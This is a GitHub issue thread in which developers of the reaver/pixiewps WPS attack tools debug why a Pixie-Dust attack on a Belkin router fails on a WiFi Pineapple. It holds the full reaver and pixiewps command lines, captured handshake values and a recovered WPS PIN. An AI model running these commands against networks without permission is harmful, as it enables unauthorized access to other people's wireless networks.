t6x/reaver-wps-fork-t6x #35: running reaver on kali and on pineapple

chrisonline909, 2015-08-31:


d8tahead, 2015-09-01:
Question, what is the system date and time on the pineapple when you do the attack?

wiire, 2015-09-01:
This is not related to Reaver but to Pixiewps. Your current date and time on the Pineapple is off by at least -70 hours; I guess it's probably set to the last time it was connected to the Internet or the last firmware build.

Pixiewps uses the current machine date and time to reduce the keyspace of the bruteforce. If the time of the device you're running it on is set in the past (70 hours), then it won't be able to recover the seed and consequently the PIN.

When implementing Pixiewps I wasn't thinking too much at this eventuality. I'm planning to add some switches/options to set the preferred window of time to execute the bruteforce on.

chrisonline909, 2015-09-01:
just checked my date and time on the pineapple it was a hour behind my local time. so i changed that throught the pineapple to reflect the right time and tried the same attack on my ap. still pixie attack fails
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 12 s 100 ms
[Pixie-Dust]  
[Pixie-Dust]   [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]  
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]  
[Pixie-Dust]   Pixiewps 1.1
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]
root@Pineapple:~# date
Tue Sep  1 06:28:26 GMT 2015

d8tahead, 2015-09-01:
Could you do me a favor? On your pineapple, please run reaver with:

cd /sd

reaver -i wlan1mon -c 7 -b XX:XX:XX:XX:XX:XX -vvv -P -H -a -N -d 0

It will then after collecting hashes, create a file on the sd card called <targerbssid>.pixie ( this is the reason I have you cd /sd )

Please let it collect at the least, 4-5 sets of hashes before quitting.

Then, paste the content of the entire .pixie here or pastebin. 

I ran the hashes you collected from Kali, on the pineapple, and those seem to work. I've also compiled the latest pixiewps and poped it on my pineapple, and still the same results of you. 

If you can get those hashes, they will be reviewed and will try to get to the core of the problem

chrisonline909, 2015-09-02:
thank you so much for your help. 
# Generated by Reaver 1.5.2

#!/usr/bin/env bash
# Target BSSID: XX:XX:XX:XX:XX:XXX
# Target ESSID: XXXXXXX
# Target MANUFACTURER: Belkin International
# Target MODEL: Belkin N600DB Wireless Router
# Target MODEL NUMBER: F9K1102 v2

# PKE    : d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b
# PKR    : d3ae38401c0706be0b3aff039e170d98adffa7a42af2e6d37b705db01e271941db5541301d2990acd75d98a584cdd0faf1ca380bb599d0bd1f6434a4aa076f1b9ee17de31a3e6321a0853e31c3fb1edd31dd3a985cc482029b00945b9ff737125e0fc3e128d11bd2d161c6fe9e5f3e5a8d3bc4872c9cb88093f8b6ff7b04aacb8b8c0d47ff3e11131a4b2c523a00e4c58ac6069c863e5f5c4f2ba69b65ab451966865660b55436093d304e09bafbd5ace64c6761e37a6d3d798edb1f2d4bb6aa
# E-Hash1: 571a141104d0837b46729aaae6e129426f69d6cf4b9808dcd374d4ca52f54678
# E-Hash2: 062dcbdb85f6884524f57e7d74f452309c5e1b1be5a82dac9050e69f66214cc7
# AuthKey: 7e5e7d28c1f13fd0563f97001d332616d1cdf4637bc01669c32c65e4837e0621
# E-Nonce: 7086c0556b065f3f07fc956d7d2c1075

#-----Full command-----#
pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -r d3ae38401c0706be0b3aff039e170d98adffa7a42af2e6d37b705db01e271941db5541301d2990acd75d98a584cdd0faf1ca380bb599d0bd1f6434a4aa076f1b9ee17de31a3e6321a0853e31c3fb1edd31dd3a985cc482029b00945b9ff737125e0fc3e128d11bd2d161c6fe9e5f3e5a8d3bc4872c9cb88093f8b6ff7b04aacb8b8c0d47ff3e11131a4b2c523a00e4c58ac6069c863e5f5c4f2ba69b65ab451966865660b55436093d304e09bafbd5ace64c6761e37a6d3d798edb1f2d4bb6aa -s 571a141104d0837b46729aaae6e129426f69d6cf4b9808dcd374d4ca52f54678 -z 062dcbdb85f6884524f57e7d74f452309c5e1b1be5a82dac9050e69f66214cc7 -a 7e5e7d28c1f13fd0563f97001d332616d1cdf4637bc01669c32c65e4837e0621 -n 7086c0556b065f3f07fc956d7d2c1075
# Generated by Reaver 1.5.2

#!/usr/bin/env bash
# Target BSSID: XX:XX:XX:XX:XX:XXX
# Target ESSID: XXXXXXX
# Target MANUFACTURER: Belkin International
# Target MODEL: Belkin N600DB Wireless Router
# Target MODEL NUMBER: F9K1102 v2

# PKE    : d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b
# PKR    : eb880c306aecf3d3e1012bf57f1ee9bb2e0081b140efd1ce7c0d2b3dcbd950bc465641e99a96bc8d92fa2f82d4e2324abc8390471c62eebe2f68e110865822042261f67127402998eaaac60446a26033582482b4eed68e11a4b55213d53ed2069edd11d838848262b87afb3a670c1b8a8baa41421e7cc203c8856a6aaeed5b52b5fdc11b10a4d4095dfc59dc52b6f0d41898d58f8578f84f3bafc5161374f76dc57b4a14217d659b072fe833e58cfbbe4aba0ba91efd3a1123adc3fc56d78714
# E-Hash1: 7a6204a6fb68ae27869757c0fbdf1bc564eaeba39531bf44094569be7743e4ea
# E-Hash2: 12e0bde69cb1b5fcf5288d41c2434d611166549a1bc243de5e682890cac02972
# AuthKey: 3d09c1201a258d22298630a96b9bc9a2fc4f5d5df1215490ac68997e1fbe889b
# E-Nonce: 20007ffc1286d6f77ebadf6705943f7f

#-----Full command-----#
pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -r eb880c306aecf3d3e1012bf57f1ee9bb2e0081b140efd1ce7c0d2b3dcbd950bc465641e99a96bc8d92fa2f82d4e2324abc8390471c62eebe2f68e110865822042261f67127402998eaaac60446a26033582482b4eed68e11a4b55213d53ed2069edd11d838848262b87afb3a670c1b8a8baa41421e7cc203c8856a6aaeed5b52b5fdc11b10a4d4095dfc59dc52b6f0d41898d58f8578f84f3bafc5161374f76dc57b4a14217d659b072fe833e58cfbbe4aba0ba91efd3a1123adc3fc56d78714 -s 7a6204a6fb68ae27869757c0fbdf1bc564eaeba39531bf44094569be7743e4ea -z 12e0bde69cb1b5fcf5288d41c2434d611166549a1bc243de5e682890cac02972 -a 3d09c1201a258d22298630a96b9bc9a2fc4f5d5df1215490ac68997e1fbe889b -n 20007ffc1286d6f77ebadf6705943f7f
# Generated by Reaver 1.5.2

#!/usr/bin/env bash
# Target BSSID: XX:XX:XX:XX:XX:XXX
# Target ESSID: XXXXXXX
# Target MANUFACTURER: Belkin International
# Target MODEL: Belkin N600DB Wireless Router
# Target MODEL NUMBER: F9K1102 v2

# PKE    : d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b
[... cut ...] 61680f06f0fa5bb5ceac041d45107ff7614917f51290b1f732db9d8a7b6a4dd5941efa1243accd24e1223ee66017fba44b76ad971715c0a84ce0f2fab48ac4b0118f620b0980fedad55ac40b3740a24a5a0b4c74111db575658369e896fff956050a2279c7af50bf298e3c5626240190ef642919b84e3a3679dafd0b738b0d116940 -s 507a8a36e9125886310f06a54be85cc2dc58f8da2686998a7b781442000d9c7a -z dc98b20d25e11a043d06466a3461f8c224588a22ee18adc9d3c7a6396bc0f48f -a 25a37930f0cfe5e71958970d4725f77b837860a33ebf906f02efc5af0f2b9ac0 -n 6228242f36aef3105cd6f807431ff85e

chrisonline909, 2015-09-03:
here is some more hashes 

 Generated by Reaver 1.5.2

#!/usr/bin/env bash
 Target BSSID: XX:XX:XX:XX:XX:XX
 Target ESSID: XXXXXX
 Target MANUFACTURER: Belkin International
 Target MODEL: Belkin N600DB Wireless Router
 Target MODEL NUMBER: F9K1102 v2

 PKE    : d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b
 PKR    : 4aa68039b29772b17aab7fa95d8340f2641054e0a7033eb28aa4e770da03a9efd8c8620cb181002954e3af5b51aeaf0ad6688f55e5accf4d92a54421cc4463f407f72090433a17e3b5383c95a239358afb993f31a2b87def11f09f25b58839c22c34a82e00ff2b30eacdef2352c703052db912f86c7c724e90dd46ed71ae4a19b0977fd79e7207193ba6014d1171df6009a61e9ebff6789305d49ba4dbea9d9965e1532268d6b28316521f9723e4c98ec2407b939c3fa7b8e5134f8879d62e87
 E-Hash1: 472bc04d7fe2aa5b478ff2bc3098ae8e5ea5b8f9f756ff2461dede278e19bebf
 E-Hash2: d8764fd5f2b60a4e9ecda6c61387ab9806a6d51ca0aa484ee82f249a83fa7ef5
 AuthKey: 86fd886a4dae4e250b000d43418734f57d2df7985b4510f5ae1f60d0f798f278
 E-Nonce: 05c5d6972fa210c90e8f6c157e0b28da

#-----Full command-----#
pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -r 4aa68039b29772b17aab7fa95d8340f2641054e0a7033eb28aa4e770da03a9efd8c8620cb181002954e3af5b51aeaf0ad6688f55e5accf4d92a54421cc4463f407f72090433a17e3b5383c95a239358afb993f31a2b87def11f09f25b58839c22c34a82e00ff2b30eacdef2352c703052db912f86c7c724e90dd46ed71ae4a19b0977fd79e7207193ba6014d1171df6009a61e9ebff6789305d49ba4dbea9d9965e1532268d6b28316521f9723e4c98ec2407b939c3fa7b8e5134f8879d62e87 -s 472bc04d7fe2aa5b478ff2bc3098ae8e5ea5b8f9f756ff2461dede278e19bebf -z d8764fd5f2b60a4e9ecda6c61387ab9806a6d51ca0aa484ee82f249a83fa7ef5 -a 86fd886a4dae4e250b000d43418734f57d2df7985b4510f5ae1f60d0f798f278 -n 05c5d6972fa210c90e8f6c157e0b28da
 Generated by Reaver 1.5.2

#!/usr/bin/env bash
 Target BSSID: XX:XX:XX:XX:XX:XX
 Target ESSID: XXXXXX
 Target MANUFACTURER: Belkin International
 Target MODEL: Belkin N600DB Wireless Router
 Target MODEL NUMBER: F9K1102 v2

 PKE    : d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b
 PKR    : f481619cf55e6aed09842fff3c2aa8a7f8be05e77194140a9d424087c35c2edbd4782febfaf532e6d664f9d0a5bfbf19a84c5c7dc72bfa2838a979a00836729bff393082c431391ccdfde1eda0959b6772ee20ecbe95b021d97c06d78fb852674728d96718cc5c9faa3a481096c64b2daebacb3800c2cbc115c5dabce2bb2463381764858bc38cc8db8a211ff981ae48ed991a33d703b01634caae47be44335c51153b62245dab75bdf65eeaee4ac4ee00e50114624f334f2bc26b2342448c4d
 E-Hash1: f479ea0ee549003f40eb4534bc9d2dbc550957421a7fc38bbb24b8894b6a3e56
 E-Hash2: 2662f0feb7fcfe17e97e7b3df22770fd30e92f9f880b03f89ed2db9a8f63aa3d
 AuthKey: 5ad876054509721a6155cf37d80413f8541629dc157abde2e80267a5f6e88b35
 E-Nonce: 1bbf40581d9c2351674bfebe4a98aa99

#-----Full command-----#
pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -r f481619cf55e6aed09842fff3c2aa8a7f8be05e77194140a9d424087c35c2edbd4782febfaf532e6d664f9d0a5bfbf19a84c5c7dc72bfa2838a979a00836729bff393082c431391ccdfde1eda0959b6772ee20ecbe95b021d97c06d78fb852674728d96718cc5c9faa3a481096c64b2daebacb3800c2cbc115c5dabce2bb2463381764858bc38cc8db8a211ff981ae48ed991a33d703b01634caae47be44335c51153b62245dab75bdf65eeaee4ac4ee00e50114624f334f2bc26b2342448c4d -s f479ea0ee549003f40eb4534bc9d2dbc550957421a7fc38bbb24b8894b6a3e56 -z 2662f0feb7fcfe17e97e7b3df22770fd30e92f9f880b03f89ed2db9a8f63aa3d -a 5ad876054509721a6155cf37d80413f8541629dc157abde2e80267a5f6e88b35 -n 1bbf40581d9c2351674bfebe4a98aa99
 Generated by Reaver 1.5.2

#!/usr/bin/env bash
 Target BSSID: XX:XX:XX:XX:XX:XX
 Target ESSID: XXXXXX
 Target MANUFACTURER: Belkin International
 Target MODEL: Belkin N600DB Wireless Router
 Target MODEL NUMBER: F9K1102 v2

 PKE    : d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b
[... cut ...] 4d70234ca40a342cfa64241010c46a7dcd1930b6149f11df44cb8350401f7d090dbf9c9858c6ec1c2c2816299f2cea4f204e390e232454ffdd4d977746d652b8aef6d14e317b0a8c43e647c7613444faf8a50e3f6639a200664a4058365b829fb942d6aba9c0e341712faffc3612f2df1e70e66dfb6c18c52af1b6818d0cbd2195fd -s bd677a7d1a84825189d14f8d4243ffb18cceb24dab8634b9ca0e8275b84c8bda -z 3991659d3a4deb9f7a23fd03c5dfb6a9d78e28cb48736ed32171b579c40d3014 -a da21fca948ae9d14fdc3ba31b12f4e7bbe87f7e651be6c7a57c4becc3ef93f28 -n 0a572db8608d8b7519a030946960ef41

wiire, 2015-09-04:
It's an issue with Pixiewps. I will fix it as soon as possible. Thank you for testing.

Correct PIN:
```
 Pixiewps 1.1

 [*] PRNG Seed:  1441253945 (Thu Sep  3 06:19:05 2015)
 [*] PSK1:       a3:60:fc:38:36:63:52:2c:98:c7:24:16:09:83:b2:25
 [*] PSK2:       2f:4d:af:58:cf:04:cb:0d:d2:a7:03:3f:94:c9:61:95
 [*] E-S1:       64:d7:17:a1:08:e2:a1:9f:25:cf:9b:67:79:db:b4:e6
 [*] E-S2:       64:d7:17:a1:08:e2:a1:9f:25:cf:9b:67:79:db:b4:e6
 [+] WPS pin:    14987236

 [*] Time taken: 0 s 731 ms
```

closed 2015-09-04 by wiire

warbd, 2017-08-06:
here is a good example.
https://www.youtube.com/watch?v=leqBKAEqI1Q

kcdtv, 2017-08-06:
a good example of SPAM? 
Next non sense message form you will be erased straightforward and you might be banned from this repository too...